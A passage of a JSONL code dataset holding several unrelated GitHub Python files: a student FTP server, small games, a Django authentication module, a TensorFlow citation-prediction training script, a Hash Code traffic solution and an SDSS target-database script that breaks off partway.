Syntax error in parameters or arguments\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to obtain the operating system\n def SYST(self):\n reply = \"215 \" + platform.system() + \"\\r\\n\"\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to download file from server\n def RETR(self, argument):\n reply = '150 File status okay; about to open data connection.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n if not self.isActiveMode:\n data_sock, data_address = self.data_connection.accept()\n filename = self.cwd + '/' + argument\n if self.type == 'A':\n file = open(filename, 'r')\n reading = file.read(8192)\n\n while reading:\n print('reading file')\n if not self.isActiveMode:\n data_sock.send((reading + '\\r\\n').encode())\n else:\n self.data_connection.send((reading + '\\r\\n').encode())\n reading = file.read(8192)\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n elif self.type == 'I':\n file = open(filename, 'rb')\n reading = file.read(8192)\n\n while reading:\n print('reading file')\n if not self.isActiveMode:\n data_sock.send(reading)\n else:\n self.data_connection.send(reading)\n\n reading = file.read(8192)\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n # should I close the data_connection\n\n # Function to upload file to server\n def STOR(self, argument):\n reply = '150 File status okay; about to open data connection.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n if not self.isActiveMode:\n data_sock, data_address = self.data_connection.accept()\n filename = self.cwd + '/' + argument\n if self.type == 'A':\n file = open(filename, 'w')\n if not self.isActiveMode:\n file_data = data_sock.recv(8192).decode()\n else:\n file_data = self.data_connection.recv(8192).decode()\n\n while file_data:\n print('writing file')\n file.write(file_data)\n if not self.isActiveMode:\n file_data = data_sock.recv(8192).decode()\n else:\n file_data = self.data_connection.recv(8192).decode()\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n elif self.type == 'I':\n file = open(filename, 'wb')\n if not self.isActiveMode:\n file_data = data_sock.recv(8192)\n else:\n file_data = self.data_connection.recv(8192)\n\n while file_data:\n print('writing file')\n file.write(file_data)\n if not self.isActiveMode:\n file_data = data_sock.recv(8192)\n else:\n file_data = self.data_connection.recv(8192)\n\n file.close()\n if not self.isActiveMode:\n data_sock.close()\n self.data_connection.close()\n reply = '226 Closing data connection. Requested transfer action successful \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n file.close()\n\n # Function to check if connection is still active\n def NOOP(self):\n reply = '200 NOOP OK \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to delete specific file\n def DELE(self, argument):\n file_name = argument\n file_path = self.cwd + '/' + str(file_name)\n if os.path.exists(file_path):\n os.remove(file_path)\n reply = '250 Requested file action okay, completed.\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = '550 Could not execute delete, file not found\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to obtain create a directory\n def MKD(self, argument):\n directory_name = argument\n directory_path = self.cwd + '/' + str(directory_name)\n if os.path.exists(directory_path):\n reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n os.makedirs(directory_path)\n reply = '257 Folder has been successfully created\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to delete specified working directory\n def RMD(self, argument):\n directory_name = argument\n directory_path = self.cwd + '/' + str(directory_name)\n if os.path.exists(directory_name):\n os.rmdir(directory_path)\n reply = '250 Requested file action okay, completed. \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to change to parent directory\n def CDUP(self):\n print('Here')\n print(self.cwd)\n parent_directory = self.cwd.split('/')\n parent_directory = parent_directory[:-1]\n parent_directory = '/'.join(parent_directory)\n print(parent_directory)\n\n if os.path.exists(parent_directory):\n self.cwd = parent_directory\n reply = '200 Changed directory successfully \\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n else:\n reply = '550 Requested action not taken. File/Directory unavailable\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n\n # Function to end FTP session\n def QUIT(self):\n reply = '221 Goodbye\\r\\n'\n print('Response sent to connected client ' + self.user + ': ' + reply)\n self.command_connection.send(reply.encode())\n self.command_connection.close()\n self.isConnectionTerminated = True\n\n # establish data connection in passive mode\n def data_establish(self, host, port):\n data_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n data_socket.bind((host, port))\n data_socket.listen(5)\n return data_socket\n\n\ndef main():\n # Local Machine IP and port\n host = socket.gethostbyname(socket.gethostname())\n port = 6000\n\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind((host, port))\n print('FTP Server initialized at ' + host)\n print(\"Awaiting a connection from a client\")\n\n # infinite loop to accept multiple client conenction and run them in separate threads\n while True:\n server_socket.listen(1)\n connection_socket, address_ip = server_socket.accept()\n thread = FTPServer(connection_socket, address_ip)\n thread.start()\n\nif __name__ == '__main__':\n main()","repo_name":"NetworkFundamentalsELEN4017/FTP-Project","sub_path":"FTP_Server.py","file_name":"FTP_Server.py","file_ext":"py","file_size_in_byte":17375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26697718968","text":"room = \"start\"\nkey = False\nlooked = False\n\nwhile room != \"end\":\n if room == \"start\":\n print(\"Actions available: forward, look\")\n action = input(\"> \")\n if action == \"forward\":\n room = \"middle\"\n\n elif room == \"middle\":\n if looked == True:\n print(\"Actions available: forward, backward, look, pickup\")\n else:\n print(\"Actions available: forward, backward, look\")\n action = input(\"> \")\n if action == \"forward\":\n if key == True:\n room = \"end\"\n else:\n print(\"The door is locked.\")\n elif action == \"backward\":\n room = \"start\"\n elif action == \"look\":\n print(\"You spot a key on the floor.\")\n looked = True\n elif action == \"pickup\":\n print(\"You picked up the key!\")\n key = True\n\n if room == \"start\":\n print(\"You are standing in the entrace to the castle. There is no exit.\")\n elif room == \"middle\":\n print(\"You are in the middle room of the castle.\")\nprint(\"You have unlocked the door and escaped the castle. You win!\")\n","repo_name":"computingacademy/tcc-webinar-two","sub_path":"castle-game/castle.py","file_name":"castle.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6171743844","text":"from tkinter import *\nimport tkinter.messagebox\nmain_window=Tk()\nmain_window.title(\"Tic-Tac-Toe\")\nmain_window.geometry(\"540x590\")\nmain_window.resizable(False, False)\nk=1\ncount=0\nmy_font=('Segoe UI Historic',11,'bold')\nmy_font1=('Adobe Hebrew',10,'bold')\ndef clearbuttons():\n B1['text']=''\n B1.configure(bg='SystemButtonFace')\n B2['text']=''\n B2.configure(bg='SystemButtonFace')\n B3['text']=''\n B3.configure(bg='SystemButtonFace')\n B4['text']=''\n B4.configure(bg='SystemButtonFace')\n B5['text']=''\n B5.configure(bg='SystemButtonFace')\n B6['text']=''\n B6.configure(bg='SystemButtonFace')\n B7['text']=''\n B7.configure(bg='SystemButtonFace')\n B8['text']=''\n B8.configure(bg='SystemButtonFace')\n B9['text']=''\n B9.configure(bg='SystemButtonFace')\ndef checking():\n global k,count\n if((B1['text']=='X' and B2['text']=='X' and B3['text']=='X') or (B2['text']==\"X\" and B5['text']=='X' and B8['text']=='X')\n or (B1['text']=='X' and B4['text']=='X' and B7['text']=='X') or (B3['text']=='X'and B6['text']=='X' and B9['text']=='X')\n or (B1['text']=='X' and B5['text']=='X' and B9['text']=='X') or (B3['text']=='X'and B5['text']=='X' and B7['text']=='X')\n or (B4['text']=='X' and B5['text']=='X' and B6['text']=='X') or (B7['text']=='X'and B8['text']=='X' and B9['text']=='X')):\n tkinter.messagebox.showinfo(\"Tic-Tac-Toe\",\"Congrats!! X IS THE WINNER\")\n k=1\n count=0\n clearbuttons()\n elif((B1['text']=='O' and B2['text']=='O' and B3['text']=='O') or (B2['text']==\"O\" and B5['text']=='O' and B8['text']=='O')\n or (B1['text']=='O' and B4['text']=='O' and B7['text']=='O') or (B3['text']=='O'and B6['text']=='O' and B9['text']=='O')\n or (B1['text']=='O' and B5['text']=='O' and B9['text']=='O') or (B3['text']=='O'and B5['text']=='O' and B7['text']=='O')\n or (B4['text']=='O' and B5['text']=='O' and B6['text']=='O') or (B7['text']=='O'and B8['text']=='O' and B9['text']=='O')):\n tkinter.messagebox.showinfo(\"Tic-Tac-Toe\", \"Congrats!! O IS THE WINNER\")\n k=1\n count=0\n clearbuttons()\n elif(count==9):\n tkinter.messagebox.showinfo(\"Tic-Tac-Toe\", \"Oh!! Its a Tie Game\")\n k=1\n count=0\n clearbuttons()\ndef cliking(B):\n global k,count\n if(B['text']==''):\n if(k):\n B['text']='X'\n k=0\n count=count+1\n B.configure(bg='#63f2eb')\n else:\n B['text']='O'\n k=1\n count=count+1\n B.configure(bg='#FF69B4')\n if(count>=5):\n checking()\nB1=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B1),font=my_font)\nB2=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B2),font=my_font)\nB3=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B3),font=my_font)\nB4=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B4),font=my_font)\nB5=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B5),font=my_font)\nB6=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B6),font=my_font)\nB7=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B7),font=my_font)\nB8=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B8),font=my_font)\nB9=Button(main_window,text=\"\",height=8,width=19,command=lambda:cliking(B9),font=my_font)\nB1.grid(row=0,column=0)\nB2.grid(row=0,column=1)\nB3.grid(row=0,column=2)\nB4.grid(row=1,column=0)\nB5.grid(row=1,column=1)\nB6.grid(row=1,column=2)\nB7.grid(row=2,column=0)\nB8.grid(row=2,column=1)\nB9.grid(row=2,column=2)\nLabel(main_window,text=\"Player 1 is X,Player 2 is O\",font=my_font1).grid(row=4,column=1)\nend=Button(main_window,text=\"End Game\",command=main_window.destroy,bg='orange',font=my_font)\nend.grid(row=5,column=1)\nmain_window.mainloop()","repo_name":"SurajKumar-27/Tic-tac-toe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32141894240","text":"from urllib.error import HTTPError\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urljoin\nfrom cgi import parse_header\nimport json\nfrom django.conf import settings\nfrom rest_framework import authentication\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import get_authorization_header\n\n\nclass User(object):\n def __init__(self, id):\n self.__id = id\n\n def get_id(self):\n return self.__id\n\n def is_authenticated(self):\n return True\n\n def __str__(self):\n return \"User \" + str(self.__id)\n\n\nclass PolicyCompassAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request):\n token = self.__get_token(request)\n if token:\n return User(token), None\n else:\n return None\n\n def __get_token(self, request):\n auth = get_authorization_header(request).split()\n\n if not auth or auth[0].lower() != b'token':\n return None\n\n if len(auth) == 1:\n msg = 'Invalid token header. No credentials provided.'\n raise exceptions.AuthenticationFailed(msg)\n\n elif len(auth) > 2:\n msg = 'Invalid token header. Token string should not contain spaces.'\n raise exceptions.AuthenticationFailed(msg)\n\n return auth[1]\n\n\nclass AdhocracyUser:\n def __init__(self, user_ressource_path, is_admin=False):\n self.resource_path = user_ressource_path\n self.is_admin = is_admin\n self.is_staff = False\n self.is_superuser = is_admin\n self.user_permissions = []\n self.groups = []\n\n def get_username(self):\n return self.resource_path\n\n def is_authenticated(self):\n return True\n\n def get_all_permissions(self):\n return self.user_permissions\n\n def set_password(self, _password):\n raise NotImplementedError\n\n def check_password(self, _password):\n raise NotImplementedError\n\n def save(self):\n raise NotImplementedError\n\n def delete(self):\n raise NotImplementedError\n\n def __repr__(self):\n return \"AdhocracyUser('%s', is_admin=%r)\" % (self.resource_path, self.is_admin)\n\n\nclass AdhocracyAuthentication(authentication.BaseAuthentication):\n def authenticate(self, request):\n adhocracy_base_url = settings.PC_SERVICES['references'][\n 'adhocracy_api_base_url']\n user_path = request.META.get('HTTP_X_USER_PATH')\n user_token = request.META.get('HTTP_X_USER_TOKEN')\n user_url = urljoin(adhocracy_base_url, user_path)\n\n if user_path is None and user_token is None:\n return None\n elif user_path is None or user_token is None:\n raise exceptions.AuthenticationFailed(\n 'No `X-User-Path` and `X-User-Token` header provided.')\n\n request = Request(user_url)\n request.add_header('X-User-Path', user_url)\n request.add_header('X-User-Token', user_token)\n\n try:\n response = urlopen(request)\n\n content_type, params = parse_header(\n response.getheader(\"content-type\"))\n encoding = params['charset'].lower()\n if content_type != \"application/json\":\n exceptions.AuthenticationFailed(\n 'Adhocracy authentication failed due to wrong response.')\n resource_as_string = response.read().decode(encoding)\n user_resource = json.loads(resource_as_string)\n roles = user_resource['data'][\n 'adhocracy_core.sheets.principal.IPermissions']['roles']\n\n is_admin = 'admin' in roles\n return (AdhocracyUser(user_path, is_admin), None)\n\n except HTTPError as e:\n if (e.code == 400):\n raise exceptions.AuthenticationFailed(\n 'Adhocracy authentication failed due to invalid credentials.')\n else:\n raise\n","repo_name":"policycompass/policycompass-services","sub_path":"policycompass_services/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32005761533","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport logging\nimport datetime\nfrom spiro.core.backends import TENSORFLOW\nfrom spiro.core.config import set_backend\nset_backend(TENSORFLOW)\nfrom spiro.dtdg.dataloader import ogb_dataset, supported_ogb_datasets\nfrom spiro.dtdg.models.encoder.implicitTimeEncoder.staticGraphEncoder import GCN, SGCN, GAT, GraphSage\nfrom spiro.dtdg.models.decoder.sequentialDecoders import SelfAttention, PTSA, FTSA, Conv1D, NodeTrackingPTSA\nfrom spiro.dtdg.models.decoder.simpleDecoders import MLP\nfrom spiro.core.commonF import to_tensor\nfrom spiro.core.utils import printProgressBar\nfrom spiro.automl.model_assembler import assembler\nfrom spiro.automl.tf.prepare_dataset import prepare_citation_task, TARGET, LABEL\nfrom spiro.automl.tf.batch_training import NodeBatchGenerator\n\n\n\"\"\"\ndef loss_fn(predict, label):\n return torch.sqrt(torch.mean(torch.abs(torch.log1p(predict) - torch.log1p(label))))\n\"\"\"\nif __name__ == '__main__':\n #----------------------------------------------------------------\n data_to_test = supported_ogb_datasets()[1]\n this_graph = ogb_dataset(data_to_test)\n n_snapshot = len(this_graph)\n n_nodes = this_graph.dispatcher(n_snapshot -1)[0].observation.num_nodes()\n this_snapshot,_ = this_graph.dispatcher(20)\n in_dim = this_snapshot.num_node_features()\n hidden_dim = 32\n num_GNN_layers = 2\n num_RNN_layers = 3\n output_dim = 10\n layer_dims = [64,output_dim]\n activation_f = None\n encoders = ['gcn', 'sgcn', 'gat', 'sage']\n decoders = ['sa', 'ptsa', 'node_tracking_ptsa', 'tsa_sum', 'node_tracking_tsa', 'conv1d']\n epochs = 1000\n prepare_citation_task(this_graph)\n for g in range(1):\n for r in range(6):\n #set up logger\n this_logger = logging.getLogger('citation_predictoin_pipeline')\n this_logger.setLevel(logging.INFO)\n # create file handler which logs even debug messages\n log_path = f\"model_{encoders[g]}_{decoders[r]}.log\"\n fh = logging.FileHandler(log_path)\n fh.setLevel(logging.DEBUG)\n for hdlr in this_logger.handlers[:]: # remove all old handlers\n this_logger.removeHandler(hdlr)\n this_logger.addHandler(fh)\n this_logger.info(\"--------------------------------------------------------\")\n for trial in range(10):\n this_logger.info(\"--------------------------------------------------------\")\n this_logger.info(f\"start trial {trial}\")\n if g == 0:\n gnn = GCN(num_GNN_layers, in_dim, hidden_dim, activation=None,norm='none', allow_zero_in_degree=True, dropout=0.2)\n elif g == 1:\n gnn = SGCN(num_GNN_layers, in_dim, hidden_dim ,allow_zero_in_degree=True)\n elif g == 2:\n gnn = GAT([1], in_dim, hidden_dim, activation=activation_f,allow_zero_in_degree=True)\n else:\n gnn = GraphSage('gcn', in_dim, hidden_dim, activation=activation_f)\n\n output_decoder = MLP(output_dim, [hidden_dim,20,10,5], activation=\"linear\")\n \n if r == 0:\n sa = SelfAttention( 3, hidden_dim, [8,output_dim], n_nodes, 5, output_decoder)\n elif r == 1:\n sa = PTSA( 3, hidden_dim,layer_dims , n_nodes, 5, output_decoder)\n elif r == 2:\n sa = NodeTrackingPTSA( 3, hidden_dim,layer_dims , n_nodes, 5, output_decoder)\n elif r == 3:\n sa = FTSA( 3, hidden_dim, layer_dims, n_nodes, 5,3,'sum', output_decoder)\n elif r == 4:\n sa = FTSA( 3, hidden_dim, layer_dims, n_nodes, 5,3,'sum', output_decoder, node_tracking=True)\n elif r == 5:\n sa = Conv1D(hidden_dim, [8,output_dim], n_nodes, 5, output_decoder)\n else:\n pass\n\n\n this_model = assembler(gnn, sa)\n save_path = f\"model_{encoders[g]}_{decoders[r]}_{trial}\"\n loss_fn_eval = keras.losses.MeanSquaredError()\n loss_fn = keras.losses.MeanAbsolutePercentageError()\n loss_list=[]\n all_predictions=[]\n eval_loss = []\n eval_predictions = []\n eval_loss2 = []\n eval_predictions2= []\n lr = 1e-3\n optimizer = keras.optimizers.Adam(learning_rate=lr, epsilon=1e-8)\n batch_size = 5000\n batchs = NodeBatchGenerator(this_graph, 40, 10, n_snapshot-2)\n eval_batchs = NodeBatchGenerator(this_graph, 40, n_snapshot-2, n_snapshot-1)\n total_batches = len(batchs)\n for epoch in range(epochs):\n this_model.decoder.training()\n this_model.decoder.memory.reset_state()\n progress = 0\n printProgressBar(progress, total_batches, prefix = 'Progress:', suffix = 'Complete', length = 50)\n for snapshot, target, label in batchs:\n with tf.GradientTape() as tape:\n predict = tf.reshape(this_model((snapshot,target), training=True), (-1))\n all_predictions.append(predict.numpy())\n loss = loss_fn(label,predict)\n grads = tape.gradient(loss, this_model.trainable_weights)\n optimizer.apply_gradients(zip(grads, this_model.trainable_weights))\n loss_list.append(loss.numpy())\n progress+=1\n printProgressBar(progress, total_batches, prefix = 'Progress:', suffix = 'Complete', length = 50)\n print(f\"train loss: {loss_list[-1]}\")\n eval_t = n_snapshot - 2\n predicts = np.array([])\n labels = np.array([])\n for snapshot, target, label in eval_batchs:\n predicts = tf.experimental.numpy.hstack((predicts,tf.reshape(this_model((snapshot,target)),(-1))))\n labels = tf.experimental.numpy.hstack((labels, label))\n eval_predictions.append(predicts)\n print(eval_predictions[-1][:20])\n print(labels[:20])\n test_loss = loss_fn(labels, predicts).numpy()\n print(f\"test loss:{test_loss}\")\n eval_loss.append(test_loss)\n test_loss_2 = loss_fn_eval(labels, predicts).numpy()\n eval_loss2.append(test_loss_2)\n print(f\"eval loss: {test_loss_2}\")\n mini = min(eval_loss)\n batchs.on_epoch_end()\n eval_batchs.on_epoch_end()\n if eval_loss[-1] == mini:\n print(f\"save best model for loss {mini}\")\n this_model.save_model(save_path)\n if epoch > 10:\n if all(eval_loss[-40:] > mini):\n print(mini)\n break\n\n this_logger.info(loss_list)\n this_logger.info(eval_loss)\n this_logger.info(eval_loss2)\n this_logger.info(f\"best loss {mini}\")\n\n\"\"\"\n gnn = GCN(num_GNN_layers, in_dim, hidden_dim, activation=activation_f, allow_zero_in_degree=True, dropout=0.2)\n output_decoder = MLP(output_dim, [hidden_dim,20,10,5])\n decoder = FTSA( 3, hidden_dim, [8], n_nodes, 7,3,'sum', output_decoder)\n new_model = assembler(gnn, decoder)\n new_snapshot = this_graph.dispatcher(n_snapshot-2)\n next_snapshot = this_graph.dispatcher(n_snapshot-1)\n node_samples = np.arange(this_snapshot.num_nodes())\n new_predict = new_model((this_snapshot, node_samples))\n new_model.load_model(save_path)\n new_model.decoder.memory.reset_state()\n for t in range(1,n_snapshot-2):\n this_snapshot = this_graph.dispatcher(t)\n next_snapshot = this_graph.dispatcher(t+1)\n node_samples = np.arange(this_snapshot.num_nodes())\n predict = new_model((this_snapshot,node_samples))\n label = next_snapshot.node_feature()[:this_snapshot.num_nodes(), -1]\n all_predictions.append(tf.squeeze(predict).numpy())\n loss = loss_fn(tf.squeeze(predict), label)\n loss_list.append(loss.numpy())\n print(loss_list[-1])\n\n this_snapshot = this_graph.dispatcher(n_snapshot-2)\n next_snapshot = this_graph.dispatcher(n_snapshot-1)\n node_samples = np.arange(this_snapshot.num_nodes())\n predict = new_model((this_snapshot,node_samples))\n label = next_snapshot.node_feature()[:this_snapshot.num_nodes(), -1]\n eval_predictions.append(tf.squeeze(predict).numpy())\n loss = loss_fn(tf.squeeze(predict), label)\n eval_loss.append(loss.numpy())\n print(eval_loss[-1])\n\"\"\"\n","repo_name":"mcgill-cpslab/spiral","sub_path":"examples/tf/citation_prediction_sliding_window_decoder_batch.py","file_name":"citation_prediction_sliding_window_decoder_batch.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38001491648","text":"\"\"\"\nLoop while\n\nwhile expressao_booleana:\n //loop\n //incremento(ou decremento)\n\nenquanto for true, ele vai continuar rodando\n\nOBS: sempre se ligar no criterio de parada, senao vira um loop infinito...\n\nBreak\n\nutilizamos break para sair de um loop de maneira projetada\n\n\n\"\"\"\n\nn = 0\nwhile n < 5:\n print(n)\n n = n+1\nprint('')\nv = ''\nwhile v != 'sim':\n v = input('Ja acabou, jessica? ')\n\nc = 0\nwhile c < 10:\n c += 1\n if c == 7:\n break\n else:\n print(c)\nprint('sai do loop')\n","repo_name":"JorgeRoniel/Curso-de-Python","sub_path":"seção_6/loop_while.py","file_name":"loop_while.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37526273556","text":"###############################\n##\n## HASH CODE ENTRY\n##\n## Usage: python main.py \n##\n###############################\nimport sys\nimport os\nimport math\nfrom .utils.car import Car\nfrom .utils.street import Street\nfrom .utils.intersection import Intersection\n\ndef main(file_location, output_location):\n print(\"Running Hash Code Entry\")\n # Hash Code here :)\n\n input_file = open(file_location, \"r\")\n\n line_num = 0\n duration = 0\n num_intersections = 0\n num_streets = 0\n num_cars = 0\n bonus = 0\n intersections = []\n streets = []\n cars = []\n for line in input_file:\n if line_num == 0:\n numbers = line.split(\" \")\n duration = int(numbers[0])\n num_intersections = int(numbers[1])\n num_streets = int(numbers[2])\n num_cars = int(numbers[3])\n bonus = int(numbers[4])\n intersections = create_intersections(num_intersections)\n elif line_num <= num_streets:\n street_info = line.split(\" \")\n a_street = Street(street_info[2], int(street_info[3]))\n streets.append(a_street)\n intersections[int(street_info[1])].add_incoming_street(a_street)\n else:\n car_info = line.split(\" \")\n cars.append(Car(int(car_info[0]), car_info[1:]))\n line_num += 1\n input_file.close()\n print(f\"Created {len(intersections)} intersections\")\n print(f\"Created {len(streets)} streets\")\n print(f\"Created {len(cars)} cars\")\n\n # Check street usage\n add_street_usage(cars, streets, file_location)\n\n # Check inter usage\n used_intersections = list(filter(lambda x: x.ever_used(), intersections))\n \n # Output\n output_file = open(output_location, \"w\")\n output_file.write(f\"{str(len(used_intersections))}\\n\")\n for inter in used_intersections:\n output_file.write(f\"{str(inter.id)}\\n\")\n used_streets = list(filter(lambda x: x.usage > 0, inter.incoming_streets))\n output_file.write(f\"{str(len(used_streets))}\\n\")\n\n used_streets.sort(key=lambda x: x.starting_cars, reverse=True)\n total_inter_usage = 0\n for street in used_streets:\n total_inter_usage += street.usage\n\n t = duration / 214\n for street in used_streets:\n fraction = street.usage / total_inter_usage\n green_time = max(1, math.floor(t * fraction))\n output_file.write(f\"{street.name} {green_time}\\n\")\n\n output_file.close()\n\n\n\ndef create_intersections(num):\n intersections = []\n for i in range(num):\n intersections.append(Intersection(i))\n return intersections\n\n\ndef add_street_usage(cars, streets, file_location):\n head_tail = os.path.split(file_location) \n file_name = os.path.join(\".\\cache\", head_tail[1])\n\n if os.path.isfile(file_name):\n print(\"Using Cache\")\n input_file = open(file_name, \"r\")\n count = 0\n for line in input_file:\n values = line.split(\" \")\n streets[count].set_usage(int(values[0]))\n streets[count].set_starting_cars(int(values[1]))\n count += 1\n else:\n print(\"Writing Cache\")\n for a_car in cars:\n first = True\n for street_name in a_car.roads:\n for a_street in streets:\n if a_street.name == street_name:\n a_street.add_usage()\n if first:\n a_street.add_starting_cars()\n break\n first = False\n\n # Write street usage to file as cache\n output_file = open(file_name, \"w\")\n for s in streets:\n output_file.write(f\"{s.usage} {s.starting_cars}\\n\")\n\n\n# When run from the terminal\nif __name__ == '__main__':\n main(sys.argv[1], sys.argv[2])","repo_name":"hexmod/hash-code-2021","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17330746297","text":"import os\nimport numpy as np\nimport peewee\nimport astropy.io.ascii\nimport sdssdb.peewee.sdss5db.targetdb as targetdb\nimport sdssdb.peewee.sdss5db.catalogdb as catalogdb\n\nfrom sdssdb.peewee.sdss5db import database\ndatabase.set_profile('operations')\n\ntarget_dtype = [('stage', np.unicode_, 6),\n ('rsid', np.int64), # set equal to carton_to_target_pk\n ('carton_to_target_pk', np.int64), # from carton_to_target\n ('priority', np.int32),\n ('value', np.float32),\n ('lambda_eff', np.float32),\n ('delta_ra', np.float64),\n ('delta_dec', np.float64),\n ('can_offset', bool),\n ('ra', np.float64), # from target\n ('dec', np.float64),\n ('epoch', np.float32),\n ('pmra', np.float32),\n ('pmdec', np.float32),\n ('parallax', np.float32),\n ('catalogid', np.int64),\n ('catalogdb_plan', str, 12),\n ('target_pk', np.int64),\n ('magnitude', np.float32, 10), # from magnitude\n ('carton', np.unicode_, 60), # from carton\n ('carton_pk', np.int32),\n ('program', np.unicode_, 15), \n ('mapper', np.unicode_, 3), # from mapper\n ('category', np.unicode_, 15), # from category\n ('cadence', np.unicode_, 26), # from cadence\n ('fiberType', np.unicode_, 6), # from instrument\n ('plan', np.unicode_, 8), # from version\n ('tag', np.unicode_, 8)]\n\n\ndef read_cartons(version=None, filename=None):\n \"\"\"Read in cartons\n\n Parameters\n ----------\n\n version : str\n version of carton file\n\n filename : str\n explicit file name of carton file\n\n Returns\n -------\n\n cartons : Table\n table with carton information\n\n\n Notes\n -----\n\n Reads file as fixed_width, |-delimited file with astropy.io.ascii\n\n If filename is specified, reads in that file.\n\n If not, and version is specified, reads in $RSCONFIG_DIR/etc/cartons-[version].txt\n\"\"\"\n if((version is None) and (filename is None)):\n print(\"Must specify either version or filename!\")\n return\n\n if(filename is None):\n filename = os.path.join(os.getenv('RSCONFIG_DIR'),\n 'etc', 'cartons-{version}.txt')\n filename = filename.format(version=version)\n\n cartons = astropy.io.ascii.read(filename, format='fixed_width',\n delimiter='|')\n return(cartons)\n\n\ndef get_targets(carton=None, version=None, justcount=False, c2c=None):\n \"\"\"Pull targets from the targetdb\n\n Parameters\n ----------\n\n cartons : str\n label of carton to pull\n\n version : str\n plan of carton to pull\n\n justcount : bool\n if True, just return the count (default False)\n\n c2c : config\n if not None, maps cartons to fiber type and cadences (default None)\n\"\"\"\n if(justcount):\n print(\"Counting carton {p}, version {v}\".format(p=carton,\n v=version))\n else:\n print(\"Extracting carton {p}, version {v}\".format(p=carton,\n v=version))\n\n # First look at all targets in this carton/version\n ntall = (targetdb.Target.select(targetdb.Target.pk)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).count()\n\n if(justcount):\n print(\" ... {ntall} targets\".format(ntall=ntall), flush=True)\n return(ntall)\n\n # Now look at those with a cadence, instrument, and magnitude not null\n nt = (targetdb.Target.select(targetdb.Target.pk)\n .join(targetdb.CartonToTarget)\n .join(targetdb.Instrument, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Cadence, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Magnitude, peewee.JOIN.LEFT_OUTER).switch(targetdb.CartonToTarget)\n .join(targetdb.Carton)\n .join(targetdb.Version)\n .where((targetdb.Carton.carton == carton) &\n (targetdb.Version.plan == version))).count()\n\n if(nt != ntall):\n print(\"WARNING: only {nt} of {ntall} targets in carton {carton} have cadence, instrument, and magnitude non-null\".format(nt=nt, ntall=ntall, carton=carton))\n\n print(\" ... {nt} 